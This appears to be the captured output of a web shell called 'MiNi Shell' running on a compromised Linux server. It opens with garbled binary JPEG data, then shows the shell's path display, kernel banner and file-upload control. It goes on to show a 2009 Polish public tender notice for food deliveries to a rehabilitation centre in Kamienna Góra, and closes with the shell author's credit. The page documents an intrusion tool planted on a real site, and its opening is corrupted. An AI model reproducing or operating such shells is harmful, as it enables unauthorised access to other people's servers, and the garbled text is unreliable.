JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090115/5010-N-2009.html

<p class="kh_header"><b>Kamienna Góra: Dostawa artykułów spożywczych do Dolnośląskiego Centrum Rehabilitacji Spółka z o.o. w Kamiennej Górze</b><br>
<b>Numer ogłoszenia: 5010 - 2009; data zamieszczenia: 15.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Rehabilitacji Sp. z o.o. , ul. Korczaka 1, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7462570, faks 075 7462577.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dcrnzoz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do Dolnośląskiego Centrum Rehabilitacji Spółka z o.o. w Kamiennej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa artykułów spożywczych do Dolnośląskiego Centrum Rehabilitacji Spółka z o.o. w Kamiennej Górze.

Przedmiot zamówienia podzielony został na sześć części:
Część I     -  dostawa warzyw i owoców
Część II    -  dostawa artykułów spożywczych  (różne)
Część III   -  dostawa artykułów spożywczych (przyprawy)
Część IV    -  dostawa artykułów spożywczych (miód i dżem jednorazowy)
Część V     -  dostawa jaj
Część VI    -  dostawa ryb
2.	Szczegółowe zestawienie asortymentowe zamawianych artykułów zawarte jest w załącznikach do opisu przedmiotu zamówienia.
3.	Użyte w załącznikach nazwy własne (towaru lub producenta) oznaczają, iż oferowany artykuł powinien być równoważy do wskazanych, tzn. powinien posiadać porównywalną wartość odżywczą i energetyczną oraz zawartość składników , a także posiadać nie gorsze cechy jakościowe w zakresie wydajności oraz zbliżone walory smakowe.
4.	Zamawiający na bazie doświadczeń z lat ubiegłych oszacował zapotrzebowanie na wymienione artykuły na okres 12 miesięcy. Ilości te (podane w załącznikach) stanowią wartość szacunkową, co oznacza, że ostateczna ilość  zamawiana na podstawie umowy może ulec zmianie. 
5.	Miejscem dostawy jest Dolnośląskie Centrum Rehabilitacji Sp. z o.o. w Kamiennej Górze z siedzibą przy ul. J. Korczaka 1, Pawilon II B - kuchnia , parter budynku.
6.	Zamawiający będzie zamawiał wyroby sukcesywnie, w miarę potrzeb -  od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy w godzinach od 6°°do godziny 13°°.
7.	Dostawy realizowane będą w partiach, na podstawie zamówień  składanych  przez Zamawiającego z jednodniowym wyprzedzeniem w formie pisemnej, faksowej lub telefonicznej. W zamówieniu Zamawiający każdorazowo określi ilość i rodzaj zamawianego asortymentu. 
8.	Częstotliwość składanych zamówień uzależniona będzie od bieżących potrzeb Zamawiającego, przy czym szacuje się, że będzie ona nie mniejsza niż dwa razy w tygodniu. W przypadku miodu i dżemu możliwa jest jednorazowa dostawa całej zamawianej partii tych artykułów. 
9.	Dostarczane artykuły spożywcze będące przedmiotem umowy muszą być:
a)	świeże, bardzo dobrej jakości i spełniać wszystkie obowiązujące w tym zakresie normy,
b)	dostarczane w oryginalnych opakowaniach producenta, z etykietą handlową identyfikującą dany artykuł i z podanym na etykiecie terminem przydatności do spożycia  (nie dotyczy warzyw i owoców),
c)	dostarczane środkiem transportu spełniającym wymagania sanitarne dotyczące środków transportu żywności.
10.	Podana w załącznikach waga (gramatura) dotyczy pojedynczego opakowania danego artykułu. Artykuły, dla których określono wagę opakowań nie mogą być dostarczane luzem.
11.	Artykuły spożywcze powinny posiadać odpowiednio długie okresy (terminy) przydatności do spożycia, stosownie do rodzaju asortymentu.
12.	W przypadku wykrycia wad zamówionych artykułów spożywczych lub ich niezgodności asortymentowej i ilościowej ze złożonym zamówieniem, Zamawiającemu przysługuje prawo złożenia reklamacji. W przypadku złożenia uzasadnionej reklamacji, Dostawca zobowiązany jest wymienić niezwłocznie i na własny koszt towar wadliwy na wolny od wad lub doprowadzić  do zgodności z zamówieniem dostarczonego asortymentu i ilości.
13.	Reklamacje mogą być zgłaszane telefonicznie lub pisemnie przez przedstawicieli Zamawiającego wymienionych w umowie. W przypadku pisemnego zgłoszenia reklamacji, Dostawca zobowiązany jest również pisemnie potwierdzić fakt jej przyjęcia.

Załącznik nr 1 do opisu przedmiotu zamówienia

Część I. Warzywa i owoce
1. 	Burak czerwony ( 5-15 kg ) 	1.500	
2.	Cebula  ( 5-15 kg ) 	1.800	
3.	Marchew ( 5-15 kg ) 	5.000 kg
4.	Pietruszka ( 5-15 kg ) 	500 kg
5.	Seler ( 5-15 kg )  	500 kg.
6.	Ziemniaki ( 15-30 kg ) 	35.000 kg
7.	Ogórek świeży	700 kg
8.	Ogórek kiszony( 0,5 - 10 kg )	200 kg
9.	Kapusta pekińska	500 kg
10.	Kapusta kiszona ( 0,5 - 15 kg )	1.400 kg
11.	Kapusta biała	700 kg
12.	Kapusta włoska 	300 kg
13.	Kapusta czerwona	500 kg
14.	Sałata	2.500 szt.
15.	Kalafior świeży	500 szt.
16.	Koperek 	200 pęczków
17.	Pietruszka natka	200 pęczków
18.	Seler zielony młody 	100 szt.
19.	Jabłka  ( 10 - 15 kg ) skrzynka	1.500 kg
20.	Pieczarki	300 kg
21.	Pomidory świeże	2.000 kg
22.	Szczypior	100 pęczków
23.	Botwina 	100 pęczków
24.	Fasolka szparagowa	200 kg
25.	Rzodkiewka	500 pęczków
26.	Czosnek ( 0,5 - 1 kg ) 	30 kg
27.	Papryka świeża	50 kg
28.	Rzodkiew czarna	200 kg
29.	Truskawka świeża	200 kg

Załącznik nr 2 do opisu przedmiotu zamówienia

Część II. Artykuły spożywcze
1. 	Makarony różne (0,4 - 5 kg) asortyment od jednego producenta               (Makaron sudecki)	2.500 kg
2.	Woda mineralna 0,33 L   (Bogaczowianka, Anna) 1.500 L
3.	Woda mineralna  ( 1 - 1,5 L )   (Źródlana)	3.000 L
4.	Koncentrat buraczany 200 g	50 szt.
5.	Przecier pomidorowy  0,9 kg     (Halmir)	500 kg
6.	Przyprawa w płynie  ( 0,9- 2 L)    (Maggi,  Ptak)	800 L
7.	Sól ( 1 kg )	1.000 kg
8.	Rodzynki ( 100 - 200 g )	2 kg
9.	Cukier waniliowy ( 20 - 40 g )	0,5 kg
10.	Proszek do pieczenia ( 20 - 40 g )	0,5 kg
11.	Cynamon ( 20 - 40 g )	0,5 kg
12.	Kwasek cytrynowy ( 20 - 40 g ) 1 kg
13.	Żelatyna ( 20 - 40 g )	1 kg
14.	Konserwa rybna - śledź w pomidorach 300 g     (Eura Fish)	450 kg
15.	Paprykarz szczeciński 300 g    (Eura Fish)	600 kg
16.	Ogórek konserwowy ( 0,9 - 5 kg )        (Ptak)  	600 kg
17.	Papryka konserwowa ( 0,9 - 2 kg )     (Halmir)	70 kg
18.	Drożdże ( 0,1 - 0,5 kg )	40 kg
19.	Mąka pszenna ( 1 kg )               (Tortowa Bolesławiec)	2.000 kg
20.	Mąka ziemniaczana ( 0,5 - 1 kg )	50 kg
21.	Kasza manna ( 1 kg )       (Młyn Dzierżoniów)	500 kg
22.	Kasza jęczmienna ( 1 - 5 kg )     (Halmir)	500 kg
23.	Kasza gryczana  ( 0,5 - 5 kg )    Rolmak)	650 kg
24.	Kasza kukurydziana ( 0,5 - 1 kg )    (Rolmak)	200 kg
25.	Ryż ( 1 kg )       (Sonko)	2.000 kg
26.	Płatki owsiane ( 0,5 - 1 kg )       (Górskie Młyny w Stoisławiu)	150 kg
27.	Płatki jęczmienne ( 0,5 - 1 kg )	150 kg
28.	Cukier ( 1 kg )	3.000 kg
29.	Cukier puder ( 0,5 - 1 kg )	100 kg
30.	Groch suchy ( 0,5 - 5 kg )       (Rolmak)	400 kg
31.	Fasola sucha ( 0,5 - 5 kg )      (Rolmak)	400 kg
32.	Groszek konserwowy ( 400 - 600g )	150 kg
33.	Kukurydza konserwowa ( 400 - 900g )   (Hektor)	600 kg
34.	Szczaw konserwowy ( 200 - 500g )          (Ptak)	200 kg
35.	Majonez ( 900g )       (Świdnicki)	400 kg
36.	Musztarda ( 160 - 500g )	100 kg
37.	Ocet 0,5 L	50 L
38.	Olej roślinny ( 0,9 - 5 L )      Wielkopolski)	1.000 L
39.	Herbata ( 100 - 500g )     (Indyjska - Tentor)	120 kg
40.	Kawa zbożowa ( 0,5 - 1 kg )      (Kujawianka - Delecta)	700 kg
41.	Chrzan konserwowy  ( 200 -  500g )     (Ptak)	2 kg
42.	Syrop malinowy ( 1 - 5 L )       (Cymes)	500 L
43.	Przecier ogórkowy ( 0,3 - 1 kg )     (Ptak)	70 kg
44.	Keczup ( 0.5 -  1 kg )    (Tortex)	300 kg

                                                                                
Załącznik nr 3 do opisu przedmiotu zamówienia

Część III. Artykuły spożywcze - przyprawy
1.	Przyprawa typu Degusta, Kucharek, Wegeta ( 1 - 5 kg )	200 kg
2.	Pieprz naturalny mielony ( 20 - 40g )	
1,5 kg
3.	Pieprz ziołowy ( 20 - 40g )	1 kg
4.	Papryka mielona słodka ( 20 - 40g )	0,5 kg
5.	Ziele angielskie ( 15 - 30g )	0,5 kg
6.	Liść laurowy ( 10 - 30g )	0,5 kg
7.	Kminek ( 20 - 40g )	0,5 kg
8.	Majeranek ( 20 - 40g )	0,5 kg
9.	Tymianek ( 20 - 40g )	0,5 kg
10.	Bazylia ( 20 - 40g )	0,5 kg
11.	Koper suszony ( 20 - 40g )	2 kg
12.	Pietruszka suszona ( 20 - 40g )	2 kg
13.	Przyprawa do gulaszu ( 20 - 30g )	3 kg
14.	Przyprawa do kurczaka ( 20 - 30g )	3 kg
15.	Przyprawa do flaków ( 20 - 30g )	3 kg
16.	Przyprawa do bigosu ( 20 - 30g )	3 kg

Załącznik nr 4 do opisu przedmiotu zamówienia

Część IV. Artykuły spożywcze - miód i dżem jednorazowy
1.	Miód pszczeli - opakowanie jednorazowe 25 g	
11.000 szt.
2.	Dżem owocowy różny - opakowanie jednorazowe 25 g
11.000 szt.

Załącznik nr 5 do opisu przedmiotu zamówienia
Część V. Jaja 
1.	Jaja kurze ( 63 - 73g )	40.000 szt.

Załącznik nr 6 do opisu przedmiotu zamówienia

Część VI.  Ryby
1.	Filet z pangi mrożony	800 kg
2.	Filet z morszczuka mrożony	
580 kg
3.	Matjas w zalewie	300 kg
4.	Makrela wędzona (luz)	200 kg
5.	Masełko makrelowe (0,1 - 1 kg)	180 kg.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3, 03.22.10.00-6, 03.22.23.00-6, 15.20.00.00-0, 15.33.10.00-7, 15.61.10.00-7, 15.98.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. Posiadają uprawnienia do wykonywania działalności lub czynności.
2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4. Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków Wykonawcy zobowiązani są do przedstawienia w ofercie następujących oświadczeń i dokumentów:
1.  Podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu - wzór: Dokument 1 oraz stosownie do sytuacji Wykonawcy : Dokument 2A lub Dokument 2B.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dcrnzoz.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląskie Centrum Rehabilitacji Sp. z o.o.
ul. J.Korczaka 1
58-400 Kamienna Góra
Pawilon I, parter (zamówienia publiczne).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2009 godzina 10:30, miejsce: Dolnośląskie Centrum Rehabilitacji Sp. z o.o.
ul. J.Korczaka 1
58-400 Kamienna Góra
Pawilon I, parter (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com